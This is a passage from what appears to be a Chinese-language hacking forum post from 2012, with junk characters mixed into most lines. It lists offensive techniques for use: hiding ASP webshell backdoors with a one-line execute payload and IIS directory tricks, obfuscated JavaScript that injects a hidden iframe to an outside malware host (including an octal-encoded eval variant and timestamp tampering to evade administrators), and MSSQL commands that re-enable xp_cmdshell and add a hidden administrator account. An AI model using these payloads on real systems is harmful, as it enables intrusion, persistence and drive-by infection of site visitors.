/ D" N8 ^/ K% l$ n- [用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。) w1 s A/ Z( @& L) Q! _
; T" X) O' m& V5 Q1 Z53、隐藏ASP后门的两种方法; {0 Z5 i9 k0 ]' ^; F. r
1、建立非标准目录:mkdir images..\
4 h4 h7 W6 f/ J' c9 K拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
' }5 o) W" q/ {8 ]+ `& O- b! s通过web访问ASP木马:http://ip/images../news.asp?action=login
' w6 [* X) k: J9 V2 y5 Y9 V9 p5 S如何删除非标准目录:rmdir images..\ /s8 k0 H/ M; p! }- M1 R. c* r
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
# T2 g) Y; D$ b, _mkdir programme.asp
1 B$ r0 R+ F. L新建1.txt文件内容:<!--#include file=”12.jpg”-->1 y4 }) @8 @9 J& a% K. R
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
5 o6 B8 k9 a3 {attrib +H +S programme.asp
4 M8 u. U F( }1 B9 N- O" S" a- A2 X通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt5 A6 V0 m' q9 w( F% h$ @% u
/ p7 i3 A' U/ T7 I- O
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 X& C" m1 q3 `1 {5 g然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
+ N+ w( u0 c( e& ~9 Y) r7 X) U) X/ }+ O# e% C# {
55、JS隐蔽挂马, V0 c; @6 z" P5 Z7 O9 o# [
1.+ [+ T* h8 \) t( Z
var tr4c3="<iframe src=ht";* }/ W7 o" I- q3 u+ h% @9 Q! ?
tr4c3 = tr4c3+"tp:/";
6 G4 x3 Q# b0 }" c) l+ r6 ]tr4c3 = tr4c3+"/ww";6 ]! A0 x# ]) o3 D
tr4c3 = tr4c3+"w.tr4";$ X! V7 t8 d# K* I
tr4c3 = tr4c3+"c3.com/inc/m";! }: | l9 M9 _1 n0 J7 B. Z, D
tr4c3 = tr4c3+"m.htm style="display:none"></i";
$ o8 E% L& D3 J' o6 Htr4c3 =tr4c3+"frame>'";$ N6 E- v( l, p' ]2 e
document.write(tr4c3);9 N6 m2 _1 u. j! i, T& \
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
+ `' s1 a7 h2 A+ T3 b) F/ t0 R6 M: ^2 ^5 O) \
2.2 y9 c+ Q# }7 T" M* c6 } c- k# L5 v( y
转换进制,然后用EVAL执行。如" T; A; i+ S( C P$ x
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");' l2 g2 u% j, Q# x
不过这个有点显眼。
1 p, v# u; W7 R/ i& T X( D3.4 n, F5 @1 R/ J
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
+ C! Y( P1 j. x: O6 i最后一点,别忘了把文件的时间也修改下。4 j& e# u! z4 G& ?7 j
! a9 v2 J6 y: U! C, j
56.3389终端入侵常用DOS命令
& T" b( }+ y+ h- m1 G" L6 V4 _0 J' Ttaskkill taskkill /PID 1248 /t9 S: A3 k5 H9 `+ t3 w% U: F0 x
# W) n0 e' V: t* q/ O4 Stasklist 查进程1 Y- Y; G* O0 ]3 h
4 V- M' l& y( Ocacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限" k% d9 W+ `: G, y/ C
iisreset /reboot
) e# N: O" Z+ ?" e" n' q: Gtsshutdn /reboot /delay:1 重起服务器
3 t( a; x# ?5 @* j; n
& B+ t, }0 u6 E( M$ a# ilogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
# b$ q- }: k5 V' k* B6 h. r# C* k4 D4 h2 L4 @5 s1 W$ U
query user 查看当前终端用户在线情况* e: o4 k3 Z {: A! y
; d e* u' W. |7 [要显示有关所有会话使用的进程的信息,请键入:query process *$ v6 W0 o2 O" K- f; W
% m& K' f" L! q, _" f7 ^8 z7 Z要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2" H; D8 P7 N+ P0 W c
6 k% O7 g/ e* W) p+ B4 E/ N, R9 }
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2- g g* @/ q, M8 E4 A3 t- m- O) m
- v; s4 b0 d& ^/ G) M$ [5 \要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02( E4 K- ~- b. u2 R* P% o7 ?
1 l7 _2 D6 f+ x7 u% E' f; O
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
+ A; B3 a/ P8 ]( k. Y" i2 r. E
- L4 R, z% z" t$ k1 J2 R3 ]命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统' `" Z" N. b0 {3 v) u+ h
7 {' k1 l1 W5 ?7 y: q
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
) E- I) M$ k. X% m% b0 s' ~
, M: F: `9 ~% l7 A* E. t命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机1 t3 c e: T' S+ ~5 A# H6 P$ k1 y% k
& ]$ j) U( d! S' f; _4 A
56、在地址栏或按Ctrl+O,输入:, u, a: n: ^6 Z: t
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;6 c9 y5 Q$ }9 L5 e. t4 K V
, R! Y# f: X9 K* Y
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。$ ~) `# ^' Z4 w* `
( _# @# `( q/ X. \$ M, Q
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
5 E( A4 F, i% D) v# Y# e1 b+ Y用net localgroup administrators是可以看到管理组下,加了$的用户的。* u. M' @- h; }: @
, f B. J! _" @2 U58、 sa弱口令相关命令/ p1 {+ i4 \) k! r) q& _
" ~+ s7 ~( k- I一.更改sa口令方法:
8 w2 z6 y) c8 L& J! w用sql综合利用工具连接后,执行命令:2 w$ |7 o$ e5 Z1 p
exec sp_password NULL,'20001001','sa'6 g0 q2 Z% u, z$ X5 R4 Q) \+ ~
(提示:慎用!)
# G* D) n5 }8 _6 R
4 M1 x* B2 m( V' z) U二.简单修补sa弱口令.5 b% U' {" W% s8 l. i; P+ |& w, S
7 ^7 \& q2 m1 e2 u5 ^ l9 h
方法1:查询分离器连接后执行:4 i: G9 N3 V D" W( e
if exists (select * from3 e- j" L4 t1 N o2 S
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and& d, w, [/ F2 G2 H* h5 I
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)5 m4 i+ ^2 i: C
. F4 w! `; m/ q( m' xexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'$ p& c" N1 ~5 a
/ x6 i E7 }" g
GO k1 y+ p: Z+ A) M- I
/ ~# N2 d4 C0 ~
然后按F5键命令执行完毕
# H; `! {; A& k" X+ j4 \# S2 y6 j) E
方法2:查询分离器连接后
5 Q, a) h& T% E4 D- ~( D5 I7 D0 l* ~第一步执行:use master5 V3 Y( o8 ]7 ? _+ Y
第二步执行:sp_dropextendedproc 'xp_cmdshell'
! u: t2 F v4 v. v C然后按F5键命令执行完毕
' |( z, Z+ w3 s7 D
2 M& M$ I- V+ `( l9 O/ G. ^3 h7 a/ A0 U
三.常见情况恢复执行xp_cmdshell.( D1 \, N' a8 q0 @& o. c
9 M5 a7 c' D: e& q
) s: N' T) p0 I, T, D+ e. t) ~1 未能找到存储过程'master..xpcmdshell'.
; O% z5 Q6 U+ S+ K: e 恢复方法:查询分离器连接后,2 O8 [ d, [, z, F' d
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int. Z/ ]" y/ l* Q' a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. Z; ^7 X4 d/ ]2 i' u8 Z
然后按F5键命令执行完毕
6 ?! X9 x9 N9 o: C
; e/ ]2 }! L( z- D2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
7 g6 s3 t( ?6 ~* [ r& I" d* m. N' j恢复方法:查询分离器连接后,
, a/ o5 M3 l! {4 z5 R5 Q第一步执行:sp_dropextendedproc "xp_cmdshell"
) G7 [8 v$ u" c1 L" V/ w" p' ?+ O第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'! \/ q" ]& \1 n, p$ H
然后按F5键命令执行完毕
; h, {: R- l9 T, \) A5 P" F2 H6 K/ O3 p8 |/ F
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)- x- W. B" `7 ~, }# s$ J
恢复方法:查询分离器连接后,
( i% A: |! G S第一步执行:exec sp_dropextendedproc 'xp_cmdshell'* ?' l8 E. I, T
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
+ m2 o9 B, Y: X$ b7 D& I2 ~然后按F5键命令执行完毕
$ u6 i) m8 E; |6 K; T: V
6 s( U8 Y! ?4 P2 B+ {" o' n# s* m四.终极方法.9 g) t% C+ M3 i% ?/ e
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:5 ?% `7 P7 J7 K: w7 K6 c
查询分离器连接后,
. [7 [4 Z$ q9 @: {% v5 `. E) E2 v2000servser系统:
$ B( h! F0 b3 ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
) t6 V | [3 X6 d9 {4 D: k- f3 L1 T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'' s2 v7 D, Y2 B+ v
; U6 a5 } E* p# c( O9 Kxp或2003server系统:
& ?2 v+ l5 b6 [" w4 u, u2 Q' q* N2 i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
2 o* W+ E+ y8 R; O4 C7 B; ?) W
( q, k. M; s3 \9 U$ u9 udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'5 L: _" P* Z& w+ h! I0 I
|
发表于 2012-9-15 14:51:03
收藏
支持
反对